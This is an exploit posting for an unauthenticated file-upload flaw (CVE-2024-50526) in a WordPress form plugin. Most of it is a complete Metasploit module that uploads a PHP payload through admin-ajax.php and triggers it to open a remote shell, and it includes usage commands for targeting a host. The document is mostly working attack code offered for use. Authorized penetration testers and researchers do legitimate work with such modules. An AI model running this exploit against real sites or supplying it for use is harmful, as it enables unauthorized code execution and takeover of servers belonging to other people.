📄 WordPress MPMF Plugin 1.0.2 Shell Upload

=============================================================================================================================================
    | # Title     : WordPress MPMF Plugin 1.0.2 Unauthenticated File Upload Remote Code Execution                                               |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://wordpress.org/plugins/                                                                                              |
    =============================================================================================================================================
    
    [+] References :  https://packetstorm.news/files/id/214232/ & CVE-2024-50526
    
    [+] Summary    :  This Metasploit module exploits an unauthenticated file upload vulnerability in the WordPress Multi‑Purpose Multi‑Form (MPMF) plugin. 
                      By abusing a vulnerable AJAX action exposed via admin-ajax.php, an attacker can upload a crafted PHP file and trigger its execution to obtain remote code execution.
                      Due to variations in plugin versions and upload paths, the module follows a conservative and transparent exploitation approach. 
    				  It does not rely on unreliable automatic detection or strict success indicators. Instead, it prioritizes correct handler ordering to avoid race conditions, 
    				  supports blind triggering of the uploaded payload, and performs best‑effort cleanup where possible.
    
    [+] Usage : 
    
    use exploit/multi/http/wp_mpmf_rce
    set RHOSTS <TARGET_IP>
    set LHOST <YOUR_IP>
    set TARGETURI /
    exploit
    
    [+] POC :
    
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = AverageRanking
    
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::FileDropper
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name'           => 'WordPress MPMF Plugin Unauthenticated RCE',
            'Description'    => %q{
              This module exploits an unauthenticated file upload vulnerability in the 
              Multi-Purpose Multi-Form (MPMF) WordPress plugin. It uploads a PHP payload 
              via admin-ajax.php and executes it to gain a shell. The module handles 
              logic sequencing and session persistence automatically.
            },
            'Author'         => ['indoushka'],
            'License'        => MSF_LICENSE,
            'References'     => [['CVE', '2024-50526']],
            'Privileged'     => false,
            'Platform'       => 'php',
            'Arch'           => ARCH_PHP,
            'Payload'        => {
              'Compat'   => { 'PayloadType' => 'php' },
              'BadChars' => "\x00"
            },
            'Targets'        => [['WordPress / PHP', {}]],
            'DisclosureDate' => '2024-10-24',
            'DefaultTarget'  => 0,
            'Notes'          => {
              'Stability'   => [CRASH_SAFE],
              'Reliability' => [UNRELIABLE_SESSION],
              'SideEffects' => [ARTIFACTS_ON_DISK]
            }
          )
        )
    
        register_options([
          OptString.new('TARGETURI', [true, 'The base path to WordPress', '/']),
          OptString.new('AJAX_ACTION', [true, 'The AJAX action handled by the plugin', 'send_data']),
          OptString.new('FORM_ID', [true, 'The target mpmf_form_id', '1']),
          OptString.new('WP_UPLOAD_DIR', [true, 'Relative upload path', 'wp-content/uploads/mpmf_uploads'])
        ])
      end
    
      def check
        CheckCode::Unknown('Manual verification required: check plugin directory and AJAX endpoint response.')
      end
    
      def exploit
        filename = "#{Rex::Text.rand_text_alpha_lower(8)}.php"
        php_payload = "<?php #{payload.encoded} ?>"
    
        clean_upload_dir = datastore['WP_UPLOAD_DIR'].sub(%r{^/}, '').sub(%r{/$}, '')
        
        data = Rex::MIME::Message.new
        data.add_part(datastore['AJAX_ACTION'], nil, nil, 'form-data; name="action"')
        data.add_part(datastore['FORM_ID'], nil, nil, 'form-data; name="mpmf_form_id"')
        data.add_part('1', nil, nil, 'form-data; name="count_files"')
        data.add_part('1', nil, nil, 'form-data; name="count"')
        data.add_part(php_payload, 'application/octet-stream', 'binary', "form-data; name=\"file1\"; filename=\"#{filename}\"")
    
        print_status("Uploading payload #{filename}...")
    
        res = send_request_cgi({
          'method'    => 'POST',
          'uri'       => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
          'ctype'     => "multipart/form-data; boundary=#{data.bound}",
          'data'      => data.to_s
        })
    
        fail_with(Failure::UnexpectedReply, "Upload failed (HTTP Code: #{res&.code})") unless res&.code == 200
        register_file_for_cleanup(File.join(clean_upload_dir, filename))
        upload_uri = normalize_uri(target_uri.path, clean_upload_dir, filename)
        print_status("Starting handler and waiting for session...")
        handler
        print_status("Triggering payload (Blind) via: #{upload_uri}")
        send_request_cgi({
          'method' => 'GET',
          'uri'    => upload_uri
        }, 5)
      end
    end
    
    Greetings to :============================================================
    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
    ==========================================================================